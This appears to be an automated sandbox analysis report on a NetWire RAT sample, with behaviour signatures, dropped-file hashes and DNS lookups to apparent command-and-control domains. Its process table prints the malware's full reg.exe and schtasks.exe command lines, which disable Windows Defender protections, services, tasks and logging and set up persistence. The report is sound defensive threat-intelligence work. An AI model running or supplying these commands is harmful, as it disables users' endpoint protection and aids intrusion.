Analysis Overview
SHA256: 00bdd3b2ccc6b339809704a8b12920327b76e6cdd9d0d1beddc38155a4532579
Threat Level: Known bad
The file 2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer was found to be: Known bad.
Malicious Activity Summary
Modifies Windows Defender Real-time Protection settings
Modifies security service
NetWire RAT payload
Modifies Windows Defender DisableAntiSpyware settings
Netwire family
Netwire
Looks for VirtualBox Guest Additions in registry
Looks for VMWare Tools registry key
Executes dropped EXE
Checks computer location settings
Checks BIOS information in registry
Loads dropped DLL
Maps connected drives based on registry
Modifies Security services
Suspicious use of SetThreadContext
Enumerates physical storage devices
Unsigned PE
System Location Discovery: System Language Discovery
NSIS installer
Suspicious use of WriteProcessMemory
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Scheduled Task/Job: Scheduled Task
Uses Task Scheduler COM API
Suspicious behavior: EnumeratesProcesses
Checks processor information in registry
MITRE ATT&CK
Enterprise Matrix V16
Analysis: static1
Detonation Overview
Reported: 2025-04-20 01:09
Signatures
Unsigned PE
Analysis: behavioral2
Detonation Overview
Submitted: 2025-04-20 01:09
Reported: 2025-04-20 01:12
Platform: win11-20250410-en
Max time kernel: 1s
Max time network: 133s
Command Line
Signatures
NetWire RAT payload
Netwire
Netwire family
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\WinDriversQt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\WinDriversQt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
NSIS installer
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\WinDriversQt.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
| Process | Command line |
| C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | "C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe" |
| C:\Users\Admin\AppData\Roaming\WinDriversQt.exe | "C:\Users\Admin\AppData\Roaming\WinDriversQt.exe" |
| C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | "C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe" |
| C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | "C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe" |
| C:\Windows\system32\cmd.exe | "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\B14E.tmp\B14F.tmp\B150.bat C:\Users\Admin\AppData\Roaming\WinDriversQt.exe" |
| C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | "C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe" |
| C:\Users\Admin\AppData\Roaming\nb662-full.exe | "C:\Users\Admin\AppData\Roaming\nb662-full.exe" |
| C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f |
| C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable |
| C:\Windows\system32\schtasks.exe | schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable |
| C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f |
| C:\Windows\system32\reg.exe | reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f |
| C:\Windows\system32\reg.exe | reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\system32\reg.exe | reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\system32\reg.exe | reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\system32\reg.exe | reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f |
| C:\Windows\SysWOW64\schtasks.exe | "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\SDgtKxxeaGYFg" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7F10.tmp" |
| C:\Windows\SysWOW64\schtasks.exe | "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\DiFGHpZsWh" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7F0E.tmp" |
| C:\Windows\SysWOW64\schtasks.exe | "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\yBrhLIdmRX" /XML "C:\Users\Admin\AppData\Local\Temp\tmp7F0F.tmp" |
| C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | "{path}" |
| C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | "{path}" |
| C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | "{path}" |
| C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | "{path}" |
| C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | "{path}" |
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | maelus.mine.nu | udp |
| US | 8.8.8.8:53 | victoire.dyndns.biz | udp |
Files
C:\Users\Admin\AppData\Roaming\WinDriversQt.exe
| MD5 | 279205de551b3053fc8b973150577120 |
| SHA1 | 8a78379b3af83ac4f2b1b07b7f968e2db7d1ea0b |
| SHA256 | 1d4070b3c282670191d1c5236ccad902e44e33a4d3211488eb52cd4e5223b159 |
| SHA512 | 29664cb6ff47e5b0016076f7a3c248ed1deb90150669a4cc7357b7a190bd348372f551a652f92c459190ad479ed646cb7be465c389d039d74c5acb3eb254487b |
C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe
| MD5 | 9de85017f17de5b5872d27c4f66ca576 |
| SHA1 | abb2c3c99e58e498241f3c5b149821b79dbd1f21 |
| SHA256 | 0771ac3786c447e25abdbbfd18f67b5c25405a4266add5a227c1d69ff5048ce0 |
| SHA512 | 1265ab52ae96a97372316e2c0f1e8d648d0de7721d80a48340fb991038b6ffba640602d8592cffaa614db9b4f844b69e1d2988049a117631fe755d55759310e5 |
C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe
| MD5 | a5cc020492b0db504a7df2dbfed86cd1 |
| SHA1 | 11fb92cd5b25dfd3a02220286f49d426b3f9d003 |
| SHA256 | e98a538725d3864aff69872345f950c572d4b4b727e7c916c0de37e813dbc03d |
| SHA512 | ac69d9d6d0bc8cd632356b0c9bbc6eac6a91f6ab3ff7b3d1cbcdd5ff86cb0414643e251d2e6893afd614336c056914a815c2114b0fbc685f4a2fa780af1b0115 |
C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe
| MD5 | 6c18cac0ed1782d322f237f060c4f07d |
| SHA1 | fee4ecc2fc6c2189a81486bfa2d1a8a182100671 |
| SHA256 | 6443b61c3f5404dbcd4538e7636a9b1d4b6e5b07f38d95fd9a7794f7f30934e2 |
| SHA512 | 693d607ee51aec95d070fdc52f9ceb6716b6d36cb89184b67394cdca53c4afa9ca8bff761d39cf4290cf24ceaf5542f1868c029ed56341e92f46b9553c8899d9 |
C:\Users\Admin\AppData\Roaming\nb662-full.exe
| MD5 | 2ea0aa5b989197690e73372dc23ae796 |
| SHA1 | 497d114039585271b89fe954cea473fe32f33772 |
| SHA256 | 16c723380e74451ae1e7ca45c4abbc4773d4da194f92817d72ffaaa3da5f66f4 |
| SHA512 | 20ce64434a4cb0a806216e2647d67167a0c953e23d9ac2f8cfb80bf2c4638271d861463c802af156621a28a5c5d78e1b15c616b2e9ee2189bffeff5f7d25541d |
C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\cpudesc.dll
| MD5 | d25102051b33f61c9f7fb564a4556219 |
| SHA1 | c683964c11d5175171bd009cb08f87592c923f85 |
| SHA256 | e58e5d1d8da2ea526d0d754b4faad3773021166b0720723efb7b30f1f5075398 |
| SHA512 | 8828eec31926251d7e51b5bf1050c3519c9b7fca4f978fb6ee0bf18f9642c3460687f10ff79e5892100ecadbf49725711567c348e1dfccb3644bd9ef992a92f0 |
C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\System.dll
| MD5 | 6f5257c0b8c0ef4d440f4f4fce85fb1b |
| SHA1 | b6ac111dfb0d1fc75ad09c56bde7830232395785 |
| SHA256 | b7ccb923387cc346731471b20fc3df1ead13ec8c2e3147353c71bb0bd59bc8b1 |
| SHA512 | a3cc27f1efb52fb8ecda54a7c36ada39cefeabb7b16f2112303ea463b0e1a4d745198d413eebb3551e012c84a20dcdf4359e511e51bc3f1a60b13f1e3bad1aa8 |
C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\LangDLL.dll
| MD5 | ebd0da54db9f12ffd15206cc24355793 |
| SHA1 | 910be3bebdde55eb1ce05915a79f01ebdc622786 |
| SHA256 | 4066a0cbd9f6bb13c0f6fb064d4647ef7bc68a1be3d0caa4460b5ffd9ed1e0e6 |
| SHA512 | cee09db96267b1a30477ff074988606bdf35f9a5aa798a9a10029b11c0c347ab42a124320d777acde458828954cc8cf1a489b1673b31d589cdc4f50d4b86659d |
C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\UserInfo.dll
| MD5 | 8ef0e4eb7c89cdd2b552de746f5e2a53 |
| SHA1 | 820f681e7cec409a02b194a487d1c8af1038acf0 |
| SHA256 | 41293b9f6588e0fbdc8fcf2a9bd8e2b244cd5ff038fc13033378da337219c9dc |
| SHA512 | a68533e8a19637d0d44219549b24baba0dc4824424842f125600fda3edcafc4bb6bb340d57a00815f262d82373b440d58d6e4e5b2ceb29bb3f6bc4cbde66c3c5 |
C:\Users\Admin\AppData\Local\Temp\B14E.tmp\B14F.tmp\B150.bat
| MD5 | 665f21a9b6730aa08e62473e481b8c55 |
| SHA1 | 717d52e75ac16bf032299828dd61c86af281eb43 |
| SHA256 | dcaba420b47b5527bd3761ae8a2b76bbbf387100613b7c2f256cfe9ec58fb579 |
| SHA512 | b3c6fe2555613f4f7b30ba434e94421c397008a999ff5c07b5df349c550ef6b4d2a8b831208ad3bb25998bf9d2fe0dbb86414ef23ef9216211ab96373d9b6f1e |
C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\nsDialogs.dll
| MD5 | d9256d9acaecabb20b7e9a1595abfa36 |
| SHA1 | ece1cab181dac7729246da1d4494b8daa10c3b70 |
| SHA256 | d7b2c55977a541f8d075e48d4e0a82eec79ad247b0ed168c19a8518131acd19c |
| SHA512 | 5827cdbfde0e766d1b74ecb22f9614232031da41c21d0f6ff6c9d5dcdfc0adc23e8fd616eb020ab42208932444b5e0cb1e6d6e698bead412eae19624a180b6ff |
C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\UAC.dll
| MD5 | 4814167aa1c7ec892e84907094646faa |
| SHA1 | a57a5ecbdfa9a8777a3c587f1acb02b783afc5ee |
| SHA256 | 32dd7269abf5a0e5db888e307d9df313e87cef4f1b597965a9d8e00934658822 |
| SHA512 | fb1f35e393997ecd2301f371892b59574ee6b666095c3a435336160481f6ef7ed5635c90ce5d2cf88e5ef4a5affb46cb841b7d17e7981bd6e998531193f5d067 |
C:\Users\Admin\AppData\Local\Temp\tmp7F0F.tmp
| MD5 | 208344347dd6b0c54f85e66f6aa78480 |
| SHA1 | b72f81b8ad0f85e752a57a053eb21a05aadb822c |
| SHA256 | 347401de3cfacbbbc16d84ae0f9bdab13166e1ea0abd554fe158a025d18c7613 |
| SHA512 | 2295c8fba889be0bdd155e30716d3b254642453291bcc74d6c50b663b052a2a86e369977342c3975700b0de0c3de7f956b8364812f47bc0966f5e35d3ca14906 |
C:\Users\Admin\AppData\Local\Temp\tmp7F10.tmp
| MD5 | 6505475046c7ce0540dc2625534a035b |
| SHA1 | 1c7cfd290c88c9876b4a2230bfb15981f53d11fe |
| SHA256 | 2dc1c2039d706fb941b02f5854e2c3b9453d1910c9d4e90470cd6289ef35c8e5 |
| SHA512 | 3ab4e6e39b6cb2a5ec7f4192c185fffa35f1db827ce6fb41f0764e957c8bc931bc9c9e18267aac9a3f464eff120c2086442c61cf827e8e9504b48fa96693374c |
C:\Users\Admin\AppData\Local\Temp\tmp7F0E.tmp
| MD5 | 99757558dcf54d4ef129f8ce06ab0abc |
| SHA1 | 87a512fd9f09a5333b7edbfbc4525ece25f457f3 |
| SHA256 | 09629e136aa57495f07732c5cd5e3e04eb9244e2b16d8d6478bc7153a7ae3fd8 |
| SHA512 | bf7240d5369b09789a768f8653c6c0ec49b2d3bbc2548b00f0476fa0ce4b33ad3b262e849ee03e25f73202069fd3eea74f13c1f5e8110e206d896ac8bafefdf3 |
C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\GetFLE.ini
| MD5 | 21533b9e9b48512d41f4766286d9f54c |
| SHA1 | df97ece7c973ebbbf8a10b5ca60aac70e6359540 |
| SHA256 | d8c83f60e0b10b9a681336aa2c6776038c9d3f1ca2454e5bb7798a5bdbca4971 |
| SHA512 | 40327c0b570c039df00d9bbe7d0fd7c8cf8e7376d3b637545b687aa1c53e23e88d8673a9a1ab50e9dbc59ff31921abc3e45de55063c6f5c5af3d2c9b2a9f9d44 |
C:\Users\Admin\AppData\Local\Temp\nsyB40F.tmp\InstallOptions.dll
| MD5 | 2a03c4a7ac5ee5e0e0a683949f70971b |
| SHA1 | 3bd9877caaea4804c0400420494ad1143179dcec |
| SHA256 | d4f0042d8e7622b7e14395e926dd02edab3cdc77e82d88108b67a4d2cee9229b |
| SHA512 | 1942cdb522859f8dba46824786e361794a62e6201279201e1e0e2e07499fb6252933c5661782fccd77291c3650cafb2a7a08eee5431c8238f0da44840ee4c476 |
Analysis: behavioral1
Detonation Overview
Submitted: 2025-04-20 01:09
Reported: 2025-04-20 01:12
Platform: win10v2004-20250314-en
Max time kernel: 131s
Max time network: 135s
Command Line
Signatures
Modifies Windows Defender DisableAntiSpyware settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | C:\Windows\system32\reg.exe | N/A |
Modifies Windows Defender Real-time Protection settings
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | C:\Windows\system32\reg.exe | N/A |
| Key created | \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection | C:\Windows\system32\reg.exe | N/A |
Modifies security service
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" | C:\Windows\system32\reg.exe | N/A |
NetWire RAT payload
Netwire
Netwire family
Looks for VirtualBox Guest Additions in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Oracle\VirtualBox Guest Additions | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
Looks for VMWare Tools registry key
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3342763580-2723508992-2885672917-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\WinDriversQt.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | N/A |
Modifies Security services
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdBoot\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdFilter\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisDrv\Start = "4" | C:\Windows\system32\reg.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WdNisSvc\Start = "4" | C:\Windows\system32\reg.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1080 set thread context of 6108 | N/A | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe | C:\Users\Admin\AppData\Roaming\YrtbHB5Gfq2BVO9.exe |
| PID 4336 set thread context of 4884 | N/A | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe |
| PID 4508 set thread context of 3720 | N/A | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe | C:\Users\Admin\AppData\Roaming\ZeXD3PhMCqyv9oV.exe |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\2025-04-20_2a26ed689a49e2b3cfd71901147f8303_black-basta_cova_cryptbot_elex_hawkeye_luca-stealer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\ROJid3crwtijBOi.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\WinDriversQt.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\nb662-full.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
